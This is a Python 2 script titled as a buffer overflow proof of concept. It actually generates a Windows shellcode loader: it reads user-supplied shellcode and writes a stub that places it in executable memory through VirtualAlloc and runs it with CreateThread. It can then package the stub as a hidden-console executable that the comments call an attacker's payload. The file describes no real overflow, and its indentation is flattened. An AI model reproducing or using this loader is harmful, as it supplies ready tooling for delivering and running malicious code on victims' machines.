|
#!/usr/bin/env python
###
#Exploit : Python 2.x Buffer Overflow POC
#Tested on : Windows XP , Windows 7
#Authors : Sultan Albalawi & Chaitanya [@bofheaded]
#Discovery date : 21/jan/2017
#GitHub : https://github.com/ChaitanyaHaritash/My-Exploits/blob/master/python2.x_bof.py
#Video : https://youtu.be/hcc6Y55PWBg
#Image : https://postimg.org/image/dn5x3ww9v/
###
###
# Usage ::::
###
#1. Run exploit.py
#2. Save your shellcode into some text file
#3. Input Path of text file containing shellcode
#4. The .py file will be generated with shellcode.
#5. *Optional - Attacker just need to select option 'y' in running code.. and can have .exe payload from .py code generated :)
###
# NOTE ::::
###
#pyinstaller must be installed if user wants exe payload from python payload generated initially
#This exploit is windows compatible :)
#calc.exe shellcode =>
#http://pastebin.com/vBssgg99
import time,shutil,os,sys
if os.name == 'posix':
print "Sorry this exploit is not compatible to linux :( "
exit()
else:
banner = """
Python 2.x Buffer Overflow POC
Authors : Sultan Albalawi & Chaitanya [@bofheaded]
Susupcious Shell Activity [SSA]
"""
print banner
class make:
def __init__(self,):
print ""
def fii (self,):
print ""
if __name__ == '__main__':
shell = str(raw_input('Input Path To Your shellcode.txt file >> '))
txt = open(shell)
myshell = txt.read()
raw = """
import ctypes
ban=10
for i in range(ban):
print "|/"*i
shellcode = bytearray("""+myshell+""")
myci = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(myci),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(myci),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
"""
f = open ('stub.py' , 'w')
f.write(raw)
f.close()
print "done !"
build_exe = str(raw_input('Would You like to have an executable payload ? (y|n)>> '))
if build_exe == 'y':
os.system('C:\Python27\Scripts\pyinstaller --noconsole --onefile stub.py')
print "Please Wait ...."
time.sleep(2)
else:
print ('byee')
make()
|